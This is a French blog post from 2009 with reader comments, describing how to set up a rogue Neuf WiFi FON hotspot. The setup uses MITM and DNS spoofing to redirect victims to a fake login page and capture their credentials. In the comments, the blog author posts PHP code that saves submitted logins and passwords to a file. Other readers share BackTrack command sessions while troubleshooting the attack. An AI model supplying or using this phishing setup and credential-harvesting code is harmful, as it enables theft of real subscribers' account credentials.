mardi 17 mars 2009

Phishing hotspot Neuf WiFi FON (Video)

De plus en plus de points d'accès wifi appelés "hotspot" nous entourent, notamment Neuf WiFi.
Le principe est simple : grâce à votre identifiant de compte (Neuf ID) & mot de passe donné par votre fournisseur d'accès internet, vous pouvez vous connecter où que vous soyez à l'un des nombreux hotspots mise en place par chaque abonné (en France mais aussi à l'étranger).

Oui mais ... savez-vous qu'il est facile de faire un rogue AP dans le but de voler votre login + password ?

Le but ici est de créer un faux point d'accès wifi et de lancer une attaque MITM + DNS Spoofing sur un serveur HTTP local.
Une fois connecté, la victime est redirigée sur votre serveur HTTP en local afin de lui renvoyer un phishing de page de connection Neuf WiFi FON.

Fun :



Les outils utilisés dans cette video sont implantés dans la distribution backtrack.

Pour plus d'informations :
http://www.google.com =)

Merci à Kiki67100 pour cette article.

10 commentaires:

Anonyme a dit…

Merci pour ce tutoriel qui incite à pretter attention aux réseaux wifi et à ne pas se connecter à des réseaux inconnus.
Cependant un détail m'échappe ! Comment faire pour que la fausse page d'accueil envoie des données qui soient enregistrés sur le PC pirate ?

benjy a dit…

La personne se connecte directement à toi, donc toutes les informations passent par ton ordinateur.
Tu agis comme passerelle, donc tu as juste à sniffer.
La fausse page enregistre les données dans un fichier .txt
Ici, les DNS Spoofing permet de rediriger toutes les pages demandés sur ton serveur HTTP.
Lorsqu'une personne demande google ou autres, il est redirigé sur ton index.php
Cependant, j'aurais plus utilisé iptables au lieu du MITM ...

Anonyme a dit…

Merci pour ta réponse rapide :)
J'avais compris tout cela, mais ce que je ne comprends pas c'est comment construire l'index.php pour qu'il enregistre les logins ?

benjy a dit…

Apprendre le php ??

...

Voici un exemple :

$login = $_POST['user'];
$password = $_POST['pass'];
$file = fopen($login.'.txt',"w");
fwrite($file,"LOGIN : ".$login."\nPASSWORD : ".$password);
fclose($file);
?>

Google est ton ami =)

Thibow a dit…

Superbe démonstration dans tout les cas...
Ces point d'accès FON (en faite, NeufBox c'est associé a la société pour FON pour leur projet de Free HotSpot mondial) a déjà montré quelques problèmes de sécurité ...
En effet, une mauvaise prise en charge des cookies et des sessions windows ... Bref, le DNS spoofing est une technique qui n'est plus a détaillé, mais on vois parfaitement ici une fois encore l'efficacité que peut avoir celle ci !

seb1k a dit…

Tres sympa le tuto...

Par contre un oeil averti vera le petit "index.php" trainer dans la barre d'adresse...

Je pense pas que ca soit ca quand on se connecte direct a une borne.

Mais si mais souvenir d'apache sont bons, c'est pas tres complexe a modifier ;)

madkidz a dit…

Hello Benjy,
j'aimerai juste savoir comment tu as fait pour avoir l'index.html du hotspot ?

merci !

Adrien a dit…

Bonjour,

Tout d'abord, merci pour ton tuto et également pour ce blog tres complet et tres instructif.

J'ai cependant un probleme dans la réalisation. Lorsque je demarre le serveur DHCP j'ai l'erreur que voici :

root@bt:~# dhcpd3 at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.

No subnet declaration for at0 (10.0.0.1).
** Ignoring requests on at0. If this is not what
you want, please write a subnet declaration
in your dhcpd.conf file for the network segment
to which interface at0 is attached. **


Not configured to listen on any interfaces!

Pouvez vous m'eclairer?!

Merci :-)

HiPnO a dit…

petite question qui n'a rien à voir avec la technique : Quel est le track de la vidéo ? ça fait des années que je l'ai pas entendu et impossible de mettre un titre dessus

Anonyme a dit…

Merci pour ce tuto, j'ai reussi a faire cela hier, mon bt3 final est sur usb en mode changement persistant, et aujourd'hui j'ai voulu reéssayer et cela ma afficher:
bt ~ # ifconfig at0 up
bt ~ # ifconfig at0 mtu 1500
bt ~ # ifconfig at0 10.0.0.1 netmask 255.255.255.0
bt ~ # route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
bt ~ # dhcpd at0
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:c0:ca:23:b9:11/10.0.0/24
Sending on LPF/at0/00:c0:ca:23:b9:11/10.0.0/24
Sending on Socket/fallback/fallback-net
There's already a DHCP server running.

If you did not get this software from ftp.isc.org, please
get the latest from ftp.isc.org and install that before
requesting help.

If you did get this software from ftp.isc.org and have not
yet read the README, please read it before requesting help.
If you intend to request help from the dhcp-server@isc.org
mailing list, please read the section on the README about
submitting bug reports and requests for help.

Please do not under any circumstances send requests for
help directly to the authors of this software - please
send them to the appropriate mailing list as described in
the README file.

exiting.

Je ne comprend pas pk cela ne marche pas, je souhaite supprimer le dhcp mais je ne sais pas comment il faut procedé, ou si quelqu'un aurait une autre astuce pour m'aider ;)
Merci, a bientot